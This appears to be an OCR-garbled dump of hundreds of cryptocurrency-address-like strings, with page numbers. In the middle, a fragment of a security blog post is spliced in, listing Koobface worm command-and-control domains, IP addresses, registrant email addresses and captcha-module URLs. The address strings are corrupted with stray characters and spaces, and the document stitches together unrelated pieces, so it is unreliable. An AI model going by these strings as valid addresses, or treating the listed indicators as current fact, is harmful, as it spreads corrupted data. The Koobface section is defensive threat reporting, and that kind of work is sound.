1DSjdfJ/SUrUQIPKMZp6TLrHTKnAC5oyf5d 
1DsjoUo082Sr169usUW1lyqUjnReffjJZLFF 
1DSjJRxw99ZMWg1bRY5uvfkKQ6MSBQvVM49wR 
1DskeFQko1zEirtLndZrgB8XggshTScUW3 
1LDsLfW5RXoayBWoQ1x297xil1SQYqHaoA5g 
1DsLUWc929xYU9PNyiT86ebRpm64D6VSP4 
LDSMH2)JVF7QMfKThc4c9MTNNBHT4kPQV7X 
1DsNJc9zqXz7454ikJatmfZCDaubGsexDC 
1DsQeS9tpNo6rJMawVsUnEgZyPMaqdjik4q 
1DsQMC6BY9Bgpb69q93CajgCEaozjAEuueA 
LDSQvAMQSD]Ju7ZPs17YfLY2nygMYy6wi5n 
1DSuE9Ztn9BrBdwpgiGBAnys9BBHqxwxuj 
LDSUW1bV58ApbTRvbZLhUWq7zbWEgxMSN2 
1LDSVKdLMc5FbakdGxxXgKbArpXNm9mdKAZ 
1DsXaDk6uw1Ao84bKevks43s1luh7NDr8qx 
1DsxQthgwmp5ZfGDATbS7Ybor6é55yyWRpp 
1LDSYoQGcMi8TNp79no0Z8S1q6LS94PYdRyF 
1DsZXZEjzb5JALJ4bTSuqMPsQNaVJoLkfA 
1Dt4DksUCod2rw5TE9VdxgUbc6F0412jS8 
1Dt7mFo4dMqBNsHpPZK5ABKwLEmVHuk7SS 
1DT955VzAc3TZrjCcccnJhSCgCvTHsZGZs 
1DT9MBYsxzladLko4wl1vKKiZpMZvUbR26q 
1DtAc7DuoH6jSd24eKNCJ5CZCYG3sJ1lwvh 
1DTBcQ1cu8KiBRKGF3n26Woa57ZufyN9OKX 
1Dtdafpf8Y5DLpgev5wDkp69hmVsLYMTZh 
1DtEbsPFalc9R8Tipde5q767hRf18zzmRm 
1DtEyeRitzeAqRwY3kYwsqkughtm6yY3Jfh 
LDTF5PVkdmfJ6ccISN4YRNdA6KxqZtPuKN 
1DTfAUZ5Tb9bQSYghh47aXxX3RtlvEGAWzX 
1DtFeBDzwEUeqaKeThrfr35E4iYxTyLbPa 
1DTgRexM1LEtQpThEE5BjJnfBowH36x9uc4c 
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1DtguZQnRCF4JHR9VaxG3Pr57H8rouMsSUW 
1DTk1IR1IDppBYS934jKteahjsaz7Yk1ckS} 
1DtKswVBwwBZ]72DqAaZWMNKT6ztXuGpVa 
1LDTn1Tp8E1rhytDXW3qa2SJW5tcbwA5EQb 
1DtpRU49A20bVy3EHn5fAAkjrMhaLxgres 
1DtQS5GvFivvDWzdXETyzhKWpWRbR2Q9ZG 
1LDtQXpWbs1V1jKtWNg4rdnaidSyJT4MRC7 
1DTsqSeMXC4foMDYSdcQ7SNb1bL2BLUuABo 
1Dtt8ZhP5afM4zZA9gKwL3LwqsEwBXTX17T 
1DTtgzb4Qx9dtCQnptdXsaAfrUJmYSco8X 
1DtU71fkKaZ708eJ]awUdfvB5QwWKWAdKUUV5 
LDTVDHEJip4JXjTyRhky4BFoejUi9rGzqr 
LDTVFY57DtkXjJs9VRsdZ13LiTks3hVfRA 
LDtwWHys6HRAoiTHragZYLCNJNpCqLtMYK 
LDTy1X2zT4gGQmnGvqmjYqmVPUczMRoiNo 
LDTyB1pirMzSBfekxHRcZcwrgyWfa8jTJ2 
1DTZ7qFb8FVW1Lu8S8F7HxXLveLfY¥gvRm9 
1DtzvHMxrVCueoyhd7VRi8VVPqfKNR8Znx 
LDU2nY9FqVxY3p7GipFr4Kaqf15HP47spy 
1Du8molbdpnEqrCoJBKqizYBHUCjkFyLUD 
1DuawTDVxu7TtxHGiC9hgXdLlo4r94X3dF 
1DUBBasdfroDhcbyFxNRbUztCasBpsf9dz 
1LDuDWf5uu5N4FdAK6TpSKs1QUHUvo5z2mo 
1LDUEMY9fcrqdhB1C1dG9Z5e89Kb9gieUom 
LDUEnqoAFfh4MGc1xXwiVfmy5n4dbtZn73z 
1DufCcsQhTDe2cTP791PMXNMqpNhoTZcuZ 
1DUFePbL4NkBoPp9SHzm4v5aWnrM9EErUX 
1DufiH5d3FyW9HjvQ9UWdkxXGqPyCwgMKAp 
lduHHwY8y8CAvuwFwXNtoSYtAmHoUkM7Z 
1DUHnkD9YJ9TAs8u6ueV95fN7wqTDqkeZQm 
1DUjzGEJuwvkzzE7589f162vvb5zTrG8Cm 
1DukvSVnaeGxYArhjJcCVNbXZgxFjdJzNUx 
LDUMbTTQX5jGcbEmriZVaY]ypk9JLHoQ4a 
1DuQ4NRGqu9G969U4t6EWAP3qGg63H7ZpxL 
1LDUQUgxh8WbZrasb1REcpDcjmB6pnEWCCL 
25524 


1DurmSqqYY44vy3xF8wGDyNfcuM245rmnE 
1DutgHzYyjFMXBD8kT6WaWRSpwNm3XV8EQ 
1DuVoBRL82DnMLj9vxuwSf83kTU83a5Afc 
1DUWPGXuummh12rEfTqoiiMyy63zsCDyNk 
1LDUxrNhNPX2YvdBIlImRnokMUUFHSm5MK4So 
1DUyeXay3ut5bHbCNZUfFGSNNkxDrTdVVLm 
1DuyNcke1lRfWwkRAShrqYnszXSxeUZxMrU 
1DV1K1SpVSPyvLB1AeymQ9XBoxCkK5ogaR) 
1DV2RaQahu5WkXw1CxXpjpeTtLvfMN5dLCe 
1Dv42GQKyqMAKdugA4FVRRhhS4PgZgPbel1 
1Dv5EV6q43X4w8qAZpwHyMZRZdtfVawRAG 
LDV6WLBD3hcMjACCH2sxP4eB94Xc4CNHVY 
1DV8saL4mmGWgh7BhE13jtoxSmbg5Z6eJ9 
1DvB6zfulpor45c6HD1tCQ6g8MVgjxy147 
LDVBhQkbBa7wWgWKAXs8yZWLwaHc7EUWLM 
1DVbR7rpt2eFbiu3MMVRGhJdsrdHQw5t4Q 
1DVCcxgBVpx9YLKsTRkbOWVRMEPixyWgjt 
1DvcwCq3FtZSoGPW6A5HV8iQah8hhkqnez 
1LDvENBeFjAGShoaYTCk3x41QitUNAnEosB 
LDvFLLZfJKtRhH95ezscH6hcUN9XtHmCtc 
1DVGadHwyk1NsoS30pBvSRWcgyJ2GWB3XX 
LDvGEgN4jnxAW8KYGgFRqggmgnSENNSE8& 
1DVgrtJqwjURYMRTMtF7f1inK418xisQPuY 
1LDViLVAUGVpg1YNM1k2u7C5xvzDaQPgqdp 
1DVjeKabcmMHZKWnFQTw2cMdo5X2ynHDNpY 
1DVkc68yZLydaMrBw92aUDZVqyqwqwCkDb 
L1DvkMjm75DXm3tPJnnS7xFgrqNTGB7xxYZ 
LDVKRNViSHWEDkK2xqRGozQPcEfjWwuC73x 
L1Dvkzk8gxakyckA8t2PPpAX6cV1jskyC4u 
LDvLkA7iv5BVbiSXLkT141UjYZew8xP1J1 
LDvMEQCY Trpj4vjJsQrTbZanRyvSZ5ncpcc 
LDvVMNSVTXELDwkukhKGi7wyn3LKvScgGUp 
1DVmTgAzHXsw4Tp3zDE4mm3mhh3wPiUPVx 
LDvNRvFAPhnthoJyh6AqBj9ERNsSVqwvd] 
LDvNZKHFGTSMsieehNTrPTCMVgTqS26qcW 
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1DvomEXpbmw1Z37RiwY653N1dfS1UZCXC3 
1DVPCHqEeNZzFJ23AG09Qz57nQpgx8D4C8q 
1DvrGU3HGFbRp6Wb8wiAds53bSPUtYSjMc 
1Dvt4PQ27PE6ZZqSEVRmmrMBhkY3Cz24Qtj 
LDVUJFHQH1w7Y4GUCtFRJGviq4btG83tsG 
1DVxgqxymC5p60qNQXwG9LelARCItQXUGR 
1DvytraPeEVHSTKRCebk8YidpBqAuin9dm 
1DvzCoxt8TIHFK62UyH4QJGa3RVbynAt7C 
1LDW18Pt3qUXmojN3BjcnXkvb3TZAHKxUvZ 
1DW7Db5uVNiB48DY44Mog5qEwV81vGbS7f 
LDwC8TJtvA2DxWFjJCTBP4wWx9gAihU1gNz 
1DwcwP87LKeivt5dsNnldeZ8BgQgcy4YXF 
1DwczU8Xz5DqxEF5kfjpwHBwxPNgR2778i 
LDWEYqbWaavjUt5FByXgtSJbKg33jyb3UP 
LDWHrn6vi2EGtoKDqU4wVQD9R]JyLnbTQel 
LDwihkXpryrWTjhcPgttEvWe54fMtQtHXR 
LDWjAd9fLWFHhNdghgwbAwPRmZW1deDN7r 
1DWkhg7Ate1VSNGATKNZB3D4ZBQob3MUTk 
1DWLkjRrbEg8EiHStv5pNPou37H8qxXxySj 
LDWMjVWMi2wxrixl4cyo2trdeYkoLkKKEx9 
LDWMrmSvvaGruX9aPNpHEHaU7Gxsjnaswk 
LDWn4Q8JW3rYaLhnwr9msmvRUpz2bVMVy6 
LDWNbQW5HvXde4tU4ZdFQmc8Gp7paMpvNu 
1LDWnsMb5K4Hv4TjjziCHpKexSBtxk742vE 
LDWNYTjZtAcBZBm8xqzCcgsCPNyhisZrmD 
LDwoi5TBVTQt1XNxFUfvXLmx2UsMkdqZgm 
1LDwoJ23gzJAJSxHxXrHdhV8kAjZzCYEqy4 
LDWqX6CcVomHWtsxuHCwRabKwH58FefVbb 
LDWQYSZyQZrTuK9wmf9PEgEQes2R1VV2p5 
1DWr1T2detpZtPUEM35xUtvgdNjC7rSMzY 
1Dwra8o0J5vd4SDPYyivP7ZYhScr7y35PnG 
1DwSdzdsNatKdk8RXWViILGUADfMgWYczWG 
1DwuyBhdjgUfcq28uXQpnkVEKZAphtPxHU 
LDWuYE5jMemmSwHxXufep4KwKM2GHwW4j1P 
LDwVCjrrr7KHcMp66rebafTKyKhdrvStee 
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1DWwcTXW9GjTDPcFehs2CnuXxXCN7b4Ej8e9 
LDwwPSfWQcDcnYbJi28xSPDUEbGdKP8xVT 
1LDwypbMf5uEyWCF2UsvE5z7pzFUh9ybkwi 
1Dx2ddP1iA5TxotrTWZfk48Mb6yw1C8d1lu 
1Dx3kESfvyMrbLgvdACDE4dK3tPJaR2gpd 
1DX4wWS6TsTS7QEBxhRDBigwUtbUUAiIp4i 
1Dx5xcZGBKaB9djrMZ49avw4Zc7apC4AFP 
1DxApxBYVrEKBfyV3iNLTUZKHY1X65iEqb 
1DXAXkqSsLcPAFaoWo]6vtEq8eDKE2dfgT 
1DXCpzuSAVsQnrezFPtkTQLHUtC2hxUN8F 
1DXcqyXWxZPH4jPm9Snwsod4vzMoR606XS 
1DXduJQdaSQGF7wbfMDnWTLP3h451leEXym 
1DxDZAMpuAzFdqN2wRahGTdnuBRu7YPXbc 
1DxE9507VvwnLzVW59RC9PpAHOK8Hvao Tw 
1DxeZ2nXF3ZrbeACnQ5ECT5Xk440SAHXxE9 
1LDXFJ9L8i8YTQoMQnF9IsS7MmMmFwsBQ2UtDwy 
1DxgAUHR7E2v6MfxJmvL5P6ZuURMSFxHvNc 
1DXGcRbvqokRV8WoXpPL2qP8fmcaihrTNh 
1DxGT1xFTPBcxN5]JFyn8uCEU28LoCbTeH) 
1DXGYZREFeR8C5yadDgVKtj9WtC9ZVjJK7z 
1LDxh3ATFMYuzVmM28pJo2AaCDmw2Apysbb 
LDXHDd30NdTEdrj657b6i60yHeiLPXyGgW 
1DXibJ9TW26x9t1DiGZfHZJtCTHvaBMpev 
1Dxk7d7WZ9VN6UEHzYaLDyLTGst41M1w5u 
1DxMk1dDhV9EBRYHCYzjUUSnvGZJE2uVvjP 
1DxMormR9HCryLKT5DPuzPeYmK1AyZNFuG 
1DxMgebjD54mnBNyZ2cz6iRmqNd66LtL4T 
1DXNVF7NFtdJyf¥YCruyfmLpVG7KP2Caw6f 
1DXQ6ZBQTcDY1b4ZBQLypAJT8UfyDoQmqv 
1DXRG7uhABaexzbVL6kT2bQJ5WU2asx93d 
1DXSdkT1UPgL88L9UorgMZPfDdpdRCvaui 
1DxujFYBqxzP9UvmwE5YzZdT4hzYgK7Sgk 
LDxUVp4niFLUAKxxYNTuqw64V8QUEMEmnw 
LDXWF9MS6L1yn7P8JCrPF7EdvZFJBTL9Sc 
1DxWhXBCFDfAHb1CtetKQNdCSpwotz6BBN 


25527 


1DXWvon6XBgwmnnT4g9wztNfQcmSrwWpYa 
1DxXTfnXxvR8TAByESwCS7s2TSaTGC8r2Q 
1DxYrRu3fkqj2iLj_4a55e4n3bWAF9MBNU 
1DXz7AtPV6h3Ur8j6Kr72jlisb5414AJ9} 
1DXzDxVPqP4WHwLGXn6bi8puSdVKDy2axf 
1dXzWxYorXFL5LiicnxKfj9gaNopbSXpg 
1Dy2sGNDmDmQ5xpr4WwrWStgezdWCYkUjA 
1Dy3MX1TpvELptPrUoWVvGyJT7hPoS2EZL 
1DY474wTqgJS3CthhR8KGukltyclboVs9z 
LDY5tCQErrXLzswDoiWjogMrMtkhtZxzQu 
1dY97iVBno12TWSsgsFF6NKY69HcyrEfaV 
1Dy9zuSxeo Tws84bh8NoioEXYXhWedSosE 
1DYajZViqmtdx6EKFXmfSbVvNMfShe4AqQ 
1DYBAJja9D4XXgCZs6TZLONnxRRJZ5AyLq 
1DybaPGPoxgomd80oRmkKruVsPX9UqgoSGQW 
1DyBvTvSBLP1gc9YyqHJGXtazRiYXzsUK9 
1DyCxh5mtJ 7pKGnWvP6Ntd125XZudH789z 
1DYDRJBnzsX3JDPdmN4ADTjgbXbQpHwZbR 
1DyhYB3GMGcpzJXP4BundjmoHDhtHxGY3a 
1DYileu86FrZqrpnr}qkKuUwVomA4BCzVT6 
1DyjKPRqpK3rC3iCz2diAepVqEwfyKL5Lb 
1LDYjXuYBF6ysNAgSY5zipvfWSbYCD8gFkU 
1LDYK2mwJ vWWZCmee4HwKojmCbpBZsimM1T 
1DYLrAaepJrUuVGewFVeaUFrVqcUaQQi4a 
1DyLtP7TJN6cVULHMcSktSqPznaPyR4XUh 
LDYmMCMXn9VqN5UAXkxzks7cNMpahjBBhg6 
1DYNRRwqnULtwSAM5sT8zrBUFmQcuEeai9 
1Dyoy3Zwkqa2cQacSQLDcjPLTzv96hKuFR 
LDYq3yQVBJeRZVg7Sxgbvuna6mYSkW9PVM 
LDYRS5SXCTYYxt9rt2VS5TjFvScyJh2sokn 
1DYSjPxe6TdNg8dQwq1bpKFbqcMnpg2wgv 
LDYSqzTQ2Bdw1NB9ugpX3djY5jzye8CABy 
1DytF6HXxKTd1W9heNmyjJbZx3UiDke5DQ2 
1DYuKtgqop6VHpabL5wtZcrxjXM4KwDnSm 
1DYvanfnS155qte3n3p4qHcitNKK6mXkBy 
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1DYxGvYh6SHTKCHF7s5DA3wWA1f80eTUFuv 
1DyYRSQFIF4ChYvAAdtwF 3TWaqv78sEAQhi 
LDYYtMBqT8BsmMCwakitnkDSnSFcNGWuiv 
1dYYyHd8WQX6PBVUWEMKBrj 7s3EDomrvg 
1LDYZxwEg99p8nHf6QU4WjyYLmjayPPjqu4 
1Dz4rxRfLRhj2dUYd3qis7LheLvoLzXvWW 
1DZ6SGi3Xpj48JatgWxstbEvShLXXSwebi 
1DZCGXjvYd3BMSHM5fVkS2dhySDSihAjw2 
1DZgrXCqe4V63XbUxXRGgoThv6oy2MV7Zz 
1DzhiRcECVm73hn5bXUq8Shc8YSVZ6rkkx 
1DZhU4TBrdryKiBdBRAZBWuTkAXBZWotwy 
1DZHZRxkw5GikkBbtoAUNUotqecP8UGYkj 
LDZiFHNiF75EZAjKiSdb6YWEdsYwvjJ5QGn 
1DZk4zT2KXkyCgpKq7sdYuQydnn82KZyw 
1DZKGiS8xB2FYSJsWiXGcPmMSpMDkeSWQjR 
1DzLnc4d51MN8y9MrY¥mmpxwNFou6bwZLim 
1DZM2sjoHptPdcLrES1WKSFR76bB7Af] 3f 
1DZMStuPjUmG87qZffzA6BWt6Zef8QmUWD 
1DZMW73qnVZsBT606wshThWigj9UqbEKvw 
1DZn2pB6QVHAVPP3UB6pWoGAAgJYUHhsaF 
1DZzNGvJo2goTUWQLtsVMkHqvUmZFs9jhmk 
1DZnmRASCNd1zMnwEpBcsqoGnAqgHnY1vi 
1DznQ1sJwUK1GhoKdguoN]4td1ZyP5YjL6 
1DzPb1wJZ1LrCi5clxukaR3aAo0BziA7 SH} 
1DzQShqGuyaoSvNpLWRdtRpHnkeM8Cs4mv 
1Dzqtt6WwCg4HEfPUtNRuF4sdbimU4JaAn 
1dzRo5aj9n5Et6iGNkdyu4wlgguDp7cXm 
1DzSLJnAvbBtJaGjMLhHEYD7QckkVNaxd4e 
1DzsQp8rknwB1Tq3ZjN9VZp6ietXCq76vb 
1DzXoURXNAYzGNyjg95LuVCnCiLXMCfzBt 
1DzyUTaZh7HSNtN6bXMX73NoWqZTDoBBAe 
1E11ik4j9DGAYoMFwugLedmagNSsaMW24h 
1LE1L2w9cPRNfaM7Z6Quyd3miNgUaFjoGTJ1 
1LELEx3DkowAtbyDPzhDXdXPj9Xx9skUaAC 
1E1G7fmLoXAko3yRYL7m8yrnw8ixle9UwQ 


25529 


LE1LH8ZieyFo3pRA8HJNUHWZKWE9GPGkKCxr 
1E1i4nCQzg6hLBwn8YZ8nTS9ISnNSVCE4rg 
LE1jC8XmTTxDPKVcCYMNmocMnSbAzCkEXGm 
LE1LB7whPvgXZPCiJTSENuouj1VC3aHhL7 
LEINFcshuUcvftQaZpxXbVMT88RnhYHnWBm 
1E1nxzAzx4TZQbdz7GMm8AG6XxTYMmPUIPhg 
LELPQDhScqhTNaRCsETxWwpQKRjbjUBoGK 
LE1sCWSogqri96Fr4qrnR3nz9KxFzD7vHgx 
1LE1lsv3csqofKBKT XLPp2AP55S116ekiDZ1 
1E1VCz7ax7KC608sUgoRZA3GB3rVx7CLqR 
LELwiWSMbikjfnG6a5dGGZESKioitHtVot 
1E1ZXZE8G9ua2DyLhEvwTawBR7AVAbrniN 
LE28wqPQpPbhaVaMbBUss4c6gpLfxmiEK5 
1LE2aFnunh7dLkKGHPUp8GG96Lq1F6Ei7HMu 
1LE2C74RUBcsAshCeKVQJNthbSHncbWdg6g 
LE2fP80GNQ7aLWhUMbPj2QZGkqUdBDRuLT 
LE2heWktwG33Mz8ypLQASv9wé6gqYYNnyYir 
LE2kKRPTDxVJCntY7HdJpcfSYEwcu7GPv4w 
LE2LJGgZAsa50Zb7BznQjoFWGLeenTdAmi 
LE2NES6V3EYHK4BCnjt9q8)BgSPaQrlpmF 
1LE20Po1UUtpxEpiufpig35agbzoNsVRCLB 
LE2PTqwRa8W13jzSvD8e4qkomgu2AC4h2} 
LE2PyrSUMQxSzgg42q92ac8uqM67hUf3gR 
LE2qhvjNnfT7rjUMmxVa46SpsThcu54sEK 
LE2RQHyazPULXkXpenP3fUoNt6LNeQgp8k 
1LE2rxnSGCMPGBQWyPxESr]biLjPa6BHtL3 
LE2thk59p1k7amNawZoapcSWeou7QKkQTa 
LE2TTTtFwv7BYfM9x1DVejTZeRDnUC3 awj 
LE33y3RL3NchvFvhPHHZ7ip8A9FRPuxFU 
LE3bo0iKX8nHEM8KNNNDPSb4yEgDR1YXnvV 
LE3drLn2UmnzkKkTy7B8cfKvamyrTb3Z4fU 
LE3HUB9qtzsJh1U2DFYK6cSC2RWLgMUXbe 
LE3MP6LLG8cQYFeCFY9qrbUMG6d81sLJhZ 
LE3n4sbSxt4p97 Twi6yayrwhEXxeorQVpD 
LE3nMmoXw1w/79PA8NdVdg IsWGFpQdvhkSV 
25530 


LE3VbwixJAgcsBoDlabUamTjgRpCjCXeos 
LE3XtBM2WuSGC60jpQgY8kUugjKGKQKYUC 
LE3Y8ZKPBVgfYH4xcUVgaiVCQNu/7PrjkKfm 
1E41X5MqpEjFUmtEXYVaacQ3FKN30KQf1S 
1LE4duvuD7WJnzwBbmnd7Q5KPHiprAR1Uxs 
1LE4fonpe5y9wCtV5Uuzgmmm5r5nH6evpZk 
LE4hhmgKvPw5VzZE9pa3A98V7TKNr5PmaKu 
LE4Jcla2zQj8CcnW3ypcTH5sV7ywMBZS7E 
LE4JJVNJQFYDfnfdC6s1UjQpoCakgalbpQ 
1E4K1DJKo5CgLNrP7e8h4Ztu3sDE5VrsfH 
LE4nbMYzgBZG5PwfjuaiTqGHAbD3Ye4aG8 
1E407TkTqUanaabUsXZqC8KAxcPetyDtUH 
LE4QSM4VznS4mH4ZgmkK4eEiInNMxtHcieoGP 
LE4RmtL66XC9juXXVaq3alsjaD14pq18Ls 
1LE4SCH63xACNgZT6uUAgAzymxx4EUepDAns 
1E4X05ZKBPr]8n5GuXSnv2Hadto9CoVxs 
LE4ZaMnkE2XAcyuFMiMKZ8xpRCUTd55SDe 
LE55m3qtH6uGVogqREDJMW4CfuDz6bcoW5 
1E56vvarCytBSQjfwBXuwbKZxdcef]9mtC 
LE5aykiC26yXnq2JufeN8mNedPkKCiQLt2B 
LE5c7v92F4FIJsSEJ2eZVvXgJQB2jABifON 
1LE5e5vd5tq8R4dfmDFwkp1mfqaLBP]Lo5F 
LE5FiCupiLfvL8DGBkP7KdQ9muSv9osyY4 
LE5H39eyS2BPgZtSYoPJsS3spPXZVZv9d7 
1E5Jw8Mzfa3rovdkeuV4vzqwSmFmSES88e 
LE5kuQ1HAI1rwP3iFXApwG1kLNC2FmDR8Fg 
LE5mCBy7ADUZcusk4qiauYr1lY7rzFEfW5x 
LE5MK8g14Y3apeEFpjrmtbrp6JqzWQdmVr 
1LE5mz3DE25JCL9zsaL496f2BvMhHQXVtJK 
LE5PitbTPdzsFLUxE6p8Z7xRSvyt1XA6Fe 
LE5rJ4yVkuQ6Q2cVjguGaDaYtKs151hpkd 
LE5SV8Rz1pSQROvhy32J8iCzo2ZUTpwfZE 
LE5tB62fte4FRO2ZEYj|K7wPngtXWbZBRf6L 
LE5W6hqQNif3giXoRSeUVeb6SDLozyDfV Of 
1E5WwkcszkoYCiDhR1fiWT36Kr]8mmtnCh 
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LE5yEhv5jAeaZwKk97YNZJKOBLBrZNxcjKS 
LE5ZWW8ACTzgg IrrMsvNNXFyXsGFa3Qi97 
LE65fhEBKCpBoLFU4YMdegMvWEmxXKbhXaz 
LE6BsYno6zZEMRGDDc4MWDy14jCBMuSxXzBg 
LE6HsqntQCgSytB2JK5fZ19MWEpAMXD1aA 
1LE6KD3f54ESEC)q8cJSLZNNMmExVcSKBSfL 
LEONfvwf4ujGheBcSf7fd4GC3yvdNAJnT1 
1LE6nxL4ApUaoto3s3SN58MsQsqtxiB1NEe 
1E60XbdT7kxHdGiTfMeeR6eUf5KhAv49Vg 
LE6sNfmolAn5JsoTZ2rHbcwjUgTKMMsLrs 
1LE6sx9YEWw3YzTyeB4H7xNPSTnfXvkRrP3 
LE6tk5g74hU9HOUeZtMvRM6EYxd6SMfSgs 
LE6WcRVWUNtb4brKjZnhFafX3n5NYy3DBs 
1E72enaiwY3eqe1P2JS2mFRbovs6épNBceZ 
1E77rdS7NFBVkKWU4xWWmejpNnBtzVZRBuo 
1E7854i9S8JSZPSGgvhmgzZKFpNq6HYA23a 
1E78pXnZMUGo6Wg2bkDa5ccodPn2w8fQdXx 
1LE7av9oUPFwsayXQigPywKm4Mad68eZAmF 
LE7BrJvfTKpZXNjebVoc9cZP8m2ZteCkZt 
LE7EJkKBmMVv4r1 K8EipUNiIHQHrLQa6wq3Ap 
LE7J6xdgMv9Nh93jkx7CS2gMadbGT238vS 
LE7kiPYEQ8x3L5kTS3jBsjhnv5PqLVE6uU 
LE7qTpgJjztcd735KJEHqmC7625irHsGdg 
1E7svcB3FAGbHLdVAv6trj KRgHrbDu16F) 
1E7t30ehKrD6m8L1PhfdRPsr7zkMJnecXM 
LE7t8KYUXii2QQW85HTPMB8JpoVBTZfGq6Z 
LE7wzS7g8PVaJu7CVTH4xJUuvkKXMM5Yi9C 
LE7yle1PThjpMJmorJhnA2taqseECnbihB 
LE83HiiIYKPk4zZuJniz41ZYtJ/LQ5z8M8ph 
1E86DaBSFLOoZEpMUqFFri4YVvWkKSZTVVZi 
1E8767axyjM6FgoJVYoyA3JYQFtev1lpxNu 
LE8A0x1cNS6MXzYwxmyEkfKyZAxMnGw5BF 
LE8dpdVpdC4kv8WdHDUD1zeDMrn5zXs8sQ 
LE8fKGfUG8PYT99jmMRZnNHf3M5HZNaJ2jyt 
LE8mhTfLaiMDVGQUc4BD8yXhil15iE3vJkx 
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Currently active Koobface C &C domains, also participating in the CAPTCHA-solving, malware 
Campaigns: 


- piupiu-110809 .com - 85.234.141.92 

- xtsd20090815 .com - 85.234.141.92 - Email: bigvillyxxx@gmail.com 

- boomer-110809 .com - 85.234.141.92 

- upr200908013 .com - 85.234.141.92 - Email: kfmnmkswrnkcxlgpfdxb68@gmail.com 
- 5uz11082009 .com - 85.234.141.92 - Email: xxmgbtwgdhyv@gmail.com 


- upr0306 .com - 221.5.74.46 China Unicom Guangdong province network - Email: bigvil- 
lyxxx@gmail.com 


- findhereandnow .com - 85.234.141.92 - Email: bigvillyxxx@gmail.com 


The CAPTCHA solving process on behalf of the infected victims, is exclusively targeting 
Google web properties (piupiu-110809 .com/cap/tempgoo/GOO8cdabdfe8d68013c6217- 
ce754a519194.jpg). Koobface worm’s captcha7.dll module is active at: 

- glavnij20090809 .com/cap/?a=get &i=1 &v=7 

- $uz11082009 .com/cap/?a=get &i=3 &v=7 

- boomer-110809 .com/cap/?a=get &i=4 &v=7 


- piupiu-110809 .com/cap/?a=get &i=2 &v=7 


BlueConnex Ltd has been notified. The Koobface gang continues enjoying the largest 
market share of systematic Web 2.0 abuse 


Related posts: 

[24]Movement on the Koobface Front 

[25]Koobface - Come Out, Come Out, Wherever You Are 
[26]Dissecting Koobface Worm’s Twitter Campaign 


[27]Dissecting the Koobface Worm’s December Campaign 
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LE8MSmUSdSwmtq4Grc6zecTLCcHZKQDYGw 
LE8ngPb1doL6ap2SSzQkK9j 7Min5bostB) 
LE8um5LUZQ2kRRniaY1Kq9B3qhKjeNHAmxX 
LE8UZci9b1LYUXucvmocRVZ8zx33YcLKqx 
LE8xuUGNT3KUWfjuTgrbbQJ2466KPcyfY3 
1E92AaejJov7CyuucdmquGNKYo6BkW9cgNe 
1E93sGZSSDbhGKHFJc9n6W1zZCJBNNB1tco 
1E93xkXRqZ9PDcfKxsulEDggX12w4C)jjvr 
1E96raWjD3Y2syYbARKsZ9dK3UUWeskDjF 
LE9bfAHUWt4zGSrSsHJhKr5cW6PQ0oXmCxW 
LEOBUFeAxXEvR7kKNskE5cwiU1b8znwagjpdXx 
LE9BujXmPsvHWTMHrZTN1Sdxd72ewWSWYD8 
LE9g6Fu8Dz6G4ak3TXY5F4LKHfJDFVuhXu 
LE9GKwuxmjhY2q57Ahu81sFFai58jT3Kgb 
LE9gPXg11h1dB88LhzPhcBLRqGU9HnXyU} 
1LE9GSzZpBQR3i5wvCk4SXcQg6FFmPyv3gzr 
LEOKNEcZoEmYRYWhgwriC4f5ej69y7a3PK 
LE90VCgjdXV6NhAKcibsFCV34WsApLmLBc 
LEOP8v9CdsADQL8s45myBn2iUSAeF4ghhy 
LEOwBrMgbSrx13Z7loy4p1luhSCi2b2rFw5 
LE9YnS5BvcGkV5UEGBaPXPX6xZpXDA1U7K 
LEOZ5mbV8wg11M1cBGnXUmL86vxiGqPenM 
LEA5nHdETBvoRA7fsZXGHs4eVbmc7eTuSm 
1Ea7bRFICKRLH6Nnc36qg3CNSZx6gakfxTe 
LEA80jiF6KgqmsmvL6xjtlQNZelmFPrZDr 
LEa945UHtXxBEdsqGGk9D2MExgRaq9rrf6R 
1EaAHepxoqbuYqrhvRNgcWLmTRcqegdh9t 
1EaajTGxPGVV69WKTu3nx8NaqpKSjBiiKEU 
1LEaaKBC2JyAwAqnYZ3gjDsTkKBKeeG8gSW 
LEABwzekKkJuvfPzevDfVBDeUJHBKZh3Pkp 
1LEacbuViwFs9a3vqYW5VvfrH6P43GD4Zg6 
LeAcCMaWnoBvEgQjvAKhSdjo8uVhQHFsd 
1LEacRnoxd63MnQkeNE36TFYRp20DzPEyAo 
LEADeYQNofYMKC8KgB66GbHagdgvEGamd1 
LEaDm8XqnNeMjJ9nyCsTx67mSm7oxjcfm5 
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LEaDS58fvK3K50d10xSX45Ct5wtU6sPyM9 
LEaDumEjfobl1UPmgsu8ZZWBUcT2DuF3Tn5Q 
1Eag2FH6HcKGdGH8UUPEWWsBvTXRWTtMa] 
LEAG803W4q7mHJWdCMrCwcMX9xBuGycc8s 
LEaiKmMM8TSNG5SiIWDYvxoBMbYibanN2Sa9y 
1EajBqjLecP3AmpVrN4sb3DEmVxMbAbDHL 
LEAjJkrtKx17tLPWFHSAEFjjaDhQUEHCMV 
LEAjtejy7 PROKFQBNhghQboeN5R7aDUOhL 
1EaLe5PBdmDG5wSGcJTDHiub4UcWrYufhX 
LEALN4AG7pR3jSNjZL2S4kNmb1rCytah84 
LEarCeFrdv9LctGkRgRmjFcksZfPYCWfCe 
LEaUpjAWQYBMQ6FdGG6qkcYS6pU0OU0BQuo 
LEAurTP3n7uQbRtP7zTchW3A3PvgTgRf9y 
LEB8iXdF 7CMyEE9YmJn5qQgcbXYwbFfp79 
LEBaRvBgHD9kd26Lp2kn5GfkKsPukR6cXN6 
1EbaxVVdovM1DksRUvD98x91ReVLhfrkc5 
LEBevRx4iG9DeLiCEQJd3xiVLvnFfEYLvx 
LEbgCM4bAFvpKvhhiDVFsowXJaSBK1W143 
LEbhMaH5qPoydQCfxC3EG4smWMnkJfHVVY 
LEBHWM2khqqrhLobKpsn8eix6QyGynyDAD 
1LEBj2aPWELLGidpPTRZmCUqzkJruanwHJm 
LEBjLDNcra4VgPwykd7hdkWsFBFHL9iRuo 
LEBKYcV3d4WdPDbdDBN3HGKRRm9hxZRj5T 
LEBMV7dd4yD1Ve38pkveVhh3BMYDyk5VGB 
LEbn2QheVsx4PNxVLt4M7ammDvZWMSpByE 
LEBNhzYLgg3uCo77xDrdvRJ6sYsxhFNnSL 
LEBnREuNag81liuEiIEHC7stZ82Xzv1S8cgb 
LEBoCYkmV7yM2ofntgGL4xZk6WxiNs7V46 
LEbPjkmgdhNYcFwk2MvNMeQwWo2A0S2p1Z 
